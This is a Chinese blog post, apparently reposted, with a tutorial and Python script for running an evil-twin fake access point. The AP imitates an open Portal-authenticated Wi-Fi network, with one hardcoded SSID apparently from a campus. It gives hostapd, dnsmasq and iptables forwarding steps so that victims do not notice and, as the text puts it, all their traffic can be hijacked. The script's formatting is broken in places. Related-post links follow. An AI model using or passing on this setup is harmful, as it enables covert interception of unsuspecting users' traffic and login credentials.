如何在linux下搭建一个fakeap,使得portal认证下的用户无法发现连接你的假AP,并且能够正常上网。先说一下portal认证。无线WIFI认证方式主要有wpa2 和 open两种,而portal认证为open的一种,只不过想要获得访问权限,就得进行身份认证,无论是校园里的账号密码,或者酒店里的手机验证码都属于portal认证。运行环境,一块无线网卡负责搭建ap,有线部分负责连接目标ap。(至于两块网卡应该是可以实现的,不过下面的代码不适用,需要对NetworkManager的配置文件进行修改)

那么如何在linux下搭建一个假AP,使用户鬼使神差的连到你的AP上而不被发现呢?这里我们使用hostapd,dnsmasq伪造一个Fake AP。

1. 首先安装hostapd,dnsmasq

​sudo apt-get install hostapd

sudo apt-get install dnsmasq

2.安装完成后首先要修改hostapd、dnsmasq的配置文件

首先是hostapd的配置文件,该文件负责配置开启ap所需要的内容, hostapd的配置文件是/etc/hostapd/hostapd.conf,这个文件需要自己创建,配置文件需要修改的是essid和channel,假如你的目标网络为“test“,那么配置文件中的essid需要修改为test,channel最好和目标网络相同。下图配置为建立一个作用在3信道的essid为test的OPEN式网络的假AP:

interface=wlan0

driver=nl80211

ssid=test

hw_mode=g

channel=3

macaddr_acl=0

auth_algs=1

ignore_broadcast_ssid=0

Dnsmasq是一个小巧且方便地用于配置DNS和DHCP的工具,适用于小型网络 。如果网络环境内的机器较多,建议换用dhcpd,Dnsmasq负责分配ip和dns。配置如下:

disables dnsmasq reading any other files like /etc/resolv.conf for nameservers\nno-resolv

# Interface to bind to

interface=wlan0

#Specify starting_range,end_range,lease_time

dhcp-range=10.0.0.3,10.0.0.20,12h

# dns addresses to send to the clients

server=8.8.8.8

server=10.0.0.1

3.配置完成后,你的假AP便可以为用户分配ip和dns了

但是我们的目标是获取真正AP的认证页面。实际上,当你随意访问一个portal认证下网络的网页时,总会率先弹到认证界面,这是DNS服务器在起作用,他将所有的域名都解析为认证页面的ip,从而返回用户一个认证界面。所以我们要想给用户返回相同的界面的话,便要使用该portal网络的dns地址

当然我们连接portal服务器后,随意访问一个网站都会获得该dns地址:

nslookup qq.com

将dns地址添加到上述Dnsmasq配置文件中,便可以返给用户正确的认证界面了。

4.在这里还有一点需要注意,我们要修改NetworkManager.conf这个文件

将无线网卡设置成未托管,这样才能正常启动hostapd,内容为

[main]
plugins=keyfile

[keyfile]
unmanaged-devices=interface-name:wlan0

5.配置无线接入点的ip和子网掩码

sudo ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0

6.开启路由转发,使得我们的网卡可以转发流量

sudo sysctl -w net.ipv4.ip_forward=1

7.经过上述处理,我们可以成功的开启假ap,但是工作还没有做完

我们的目的是使得用户能够正常访问web流量,那么我们需要将假ap收到的流量转发给真正的AP,而将AP回复的信息转发给用户。这里需要设置一下iptables 转发,命令如下。

sudo iptables --flush

sudo iptables --table nat --flush

sudo iptables --delete-chain

sudo iptables --table nat --delete-chain

sudo iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

sudo iptables --append FORWARD --in-interface wlan0 -j ACCEPT

8.配置完成后,大功告成!这时便可以开启你的Fake AP了!

sudo hostapd /etc/hostapd/hostapd.conf

当用户连接你的假ap,你便可以劫持他的所有流量了!

代码如下(该代码运行在kali下,其他系统注意修改无线、有线网卡接口名称,root权限获取,essid也需要自行修改)

#coding = utf-8

import os

import subprocess

sudo = "/usr/bin/su

do"

tee = "/usr/bin/tee"

def _run_cmd_write(cmd_args, s):

# write a file using sudo

p = subprocess.Popen(cmd_a

rgs,

stdin=subprocess.PIPE,

stdout=subprocess.PIPE,

shell=False, universal_newlines=True)

p.stdin.write(s)

p.stdin.close()

p.wait()

def write_file(path, s):

_run_cmd_write((sudo, tee, path), s)

def dnsmasq():

try:

ap_iface = 'wlan0'

net_iface = 'eth0'

network_manager_cfg = "[main]\nplugins=keyfile\n\n[keyfile]\nunmanaged-devices=interface-name:wlan0\n"

os.system("sudo cp /etc/NetworkManager/NetworkManager.conf /etc/NetworkManager/NetworkManager.conf.backup")

write_file("/etc/NetworkManager/NetworkManager.conf", network_manager_cfg )

os.system("sudo service network-manager restart")

os.system("sudo ifconfig wlan0 up")

os.system("sudo cp /etc/dnsmasq.conf /etc/dnsmasq.conf.backup")

proc = subprocess.Popen("nslookup qq.com",stdin=subprocess.PIPE,stdout=subprocess.PIPE,shell=True)

lines = proc.communicate()[0].split('\n')

for line in lines:

if "Server:" in line:

dnsserver = line[9:]

break

dnsmasq_file = "# disables dnsmasq reading any other files like /etc/resolv.conf for nameservers\nno-resolv\n# Interface to bind to\ninterface=wlan0\n#Specify starting_range,end_range,lease_time\ndhcp-range=10.0.0.3,10.0.0.20,12h\n# dns addresses to send to the clients\nserver=8.8.8.8\nserver=10.0.0.1\nserver=" + dnsserver + "\n"

os.system("sudo rm /etc/dnsmasq.conf > /dev/null 2>&1")

write_file("/etc/dnsmasq.conf", dnsmasq_file)

except:

pass

def hostapd(essid,channel):

try:

#HOSTAPD CONFIG

ssid = essid

chan = channel

hostapd_file = "interface=wlan0\ndriver=nl80211\nssid=" + ssid + "\nhw_mode=g\nchannel=" + chan + "\nmacaddr_acl=0\nauth_algs=1\nignore_broadcast_ssid=0\n"

os.system("sudo rm /etc/hostapd/hostapd.conf > /dev/null 2>&1")

write_file("/etc/hostapd/hostapd.conf", hostapd_file)

except:

pass

def iptables_setting():

try:

os.system("sudo ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0")

os.system("sudo iptables --flush")

os.system("sudo iptables --table nat --flush")

os.system("sudo iptables --delete-chain")

os.system("sudo iptables --table nat --delete-chain")

os.system("sudo iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE")

os.system("sudo iptables --append FORWARD --in-interface wlan0 -j ACCEPT")

#/IPTABLES

except:

pass

def start_dnsmasq():

try:

os.system("sudo /etc/init.d/dnsmasq stop > /dev/null 2>&1")

os.system("sudo pkill dnsmasq")

os.system("sudo dnsmasq")

except:

pass

def start_hostapd():

try:

os.system("sudo sysctl -w net.ipv4.ip_forward=1 > /dev/null 2>&1")

os.system("sudo hostapd /etc/hostapd/hostapd.conf")

except:

pass

def main():

dnsmasq()

hostapd('stu-xd','3')

iptables_setting()

start_dnsmasq()

start_hostapd()

if name == 'main':

main()

渗透测试思路 | Linux下自动化搭建FakeAP,劫持用户在Portal认证下的所有流量的更多相关文章

  1. 渗透测试思路 - CTF(番外篇)

    渗透测试思路 ​ Another:影子 (主要记录一下平时渗透的一些小流程和一些小经验) CTF(番外篇) ​ 笔者是一个WEB狗,更多的是做一些WEB类型题目,只能怪笔者太菜,哭~~ 前言 ​ 本篇 ...

  2. 首款中文渗透测试专用Linux系统—MagicBox

    1.     MagicBox的介绍 首款中文渗透测试专用Linux系统——MagicBox即将问世,中文名称:“魔方系统”,开发代号:Genesis.第一版本发布时间计划为2012年12月5日 这是 ...

  3. Linux 之 利用Google Authenticator实现用户双因素认证

    一.介绍:什么是双因素认证 双因素身份认证就是通过你所知道再加上你所能拥有的这二个要素组合到一起才能发挥作用的身份认证系统.双因素认证是一种采用时间同步技术的系统,采用了基于时间.事件和密钥三变量而产 ...

  4. 渗透测试中Linux下反弹shell的认识

    最近老是觉得自己白天工作累,晚上理应休息 堕落了几天才发觉自己真垃圾,加紧向前吧. 0x00 前言 在平时渗透还是工作中经常会遇到shell反弹的情况,网上一搜反弹shell都是一大堆,但是真正遇到反 ...

  5. 内网渗透测试思路-FREEBUF

    (在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...

  6. 2019-9-20:渗透测试,基础学习,phpstudy搭建Wordpress,Burpsuite抓取WorePress cms的post包

    一.搭建WordPress的cms网站管理系统 1,下载Wordpress cms源码,下载地址:https://wordpress.org/download/ 2,将源码解压到phpstudy目录下 ...

  7. 2019-9-11:渗透测试,基础学习,ubuntu搭建LAMP

    一,apache web服务器安装 1,sudo apt-get install apache2 2,systemctl status apache2,检查apache2是否开启 #开启.关闭和重启a ...

  8. 渗透测试===kali linux的安装

    方法一: kali linux 安装在本地的vitural box 或者 wm ware中 方法二: 安装在移动硬盘或者储存卡中,插到电脑就能用

  9. 2019-9-18:渗透测试,基础学习,ubuntu搭建LNMP,phpmyadmin

    1,安装nginx:sudo apt-get install nginx 2,安装完成,输入,service nginx start开启服务,输入:netstat -ntulp |grep 80,确定 ...

随机推荐

  1. C++ STL 的初步认知

    学无止境!!!    尊重他人劳动,尊重出处:http://www.cnblogs.com/shiyangxt/archive/2008/09/11/1289493.html 我已经做了4年的MFC ...

  2. hibernate源码分析1-保存一个对象

    要点 用了event的方式贯穿CRUD的过程 值得学习 用dynamic-insert 支持 插入时 可选 全字段插入 还是仅仅有值的字段插入. 返回主键的值 用了 Serializable 类型作为 ...

  3. ip 核生成 rom 及questasim仿真时需要注意的问题

    IP 核生成 ROM 步骤1:Tools --> MegaWizard Plug-In Manager 步骤2:Create a new custom megafuction variation ...

  4. [转]物理CPU、CPU核数、逻辑CPU、超线程

    转自:http://wulc.me/2016/01/06/物理CPU.CPU核数.逻辑CPU.超线程/ 基本概念 物理CPU: 物理CPU就是插在主机上的真实的CPU硬件,在Linux下可以数不同的p ...

  5. Tomcat自动发布war包

    有两种方法: 1.将项目打成war包,复制到${tomcat.home}\webapps目录下.当tomcat启动时会自动将其解包. 有人说,不能直接将war文件夹直接复制到${tomcat.home ...

  6. P1382 楼房 (扫描线,线段树)

    题目描述 地平线(x轴)上有n个矩(lou)形(fang),用三个整数h[i],l[i],r[i]来表示第i个矩形:矩形左下角为(l[i],0),右上角为(r[i],h[i]).地平线高度为0.在轮廓 ...

  7. 如何应对pm2.5

    细颗粒物又称细粒.细颗粒.PM2.5:指环境空气中空气动力学当量直径小于等于 2.5 微米的颗粒物,也称细颗粒物.能较长时间悬浮于空气中,其在空气中含量(浓度)越高,就代表空气污染越严重.可吸入颗粒物 ...

  8. 【POJ3321】Apple Tree(DFS序,树状数组)

    题意:给一棵n个节点的树,每个节点开始有一个苹果,m次操作 1.将某个结点的苹果数异或 1 2.查询一棵子树内的苹果数 n,m<=100000   思路:最近一段时间在思考树上统计问题的算法 发 ...

  9. vue2.0 mintUI 学习备忘

    一 技术栈:vuecli+vuejs2+mintUI+axios vuecli :脚手架工具 vuejs:前端框架  mintUI:基于vuejs移动端UI  axios:vuejs ajax数据交互 ...

  10. Device Tree Usage 【转】

    转自:http://blog.chinaunix.net/uid-20522771-id-3457184.html 原文链接:http://devicetree.org/Device_Tree_Usa ...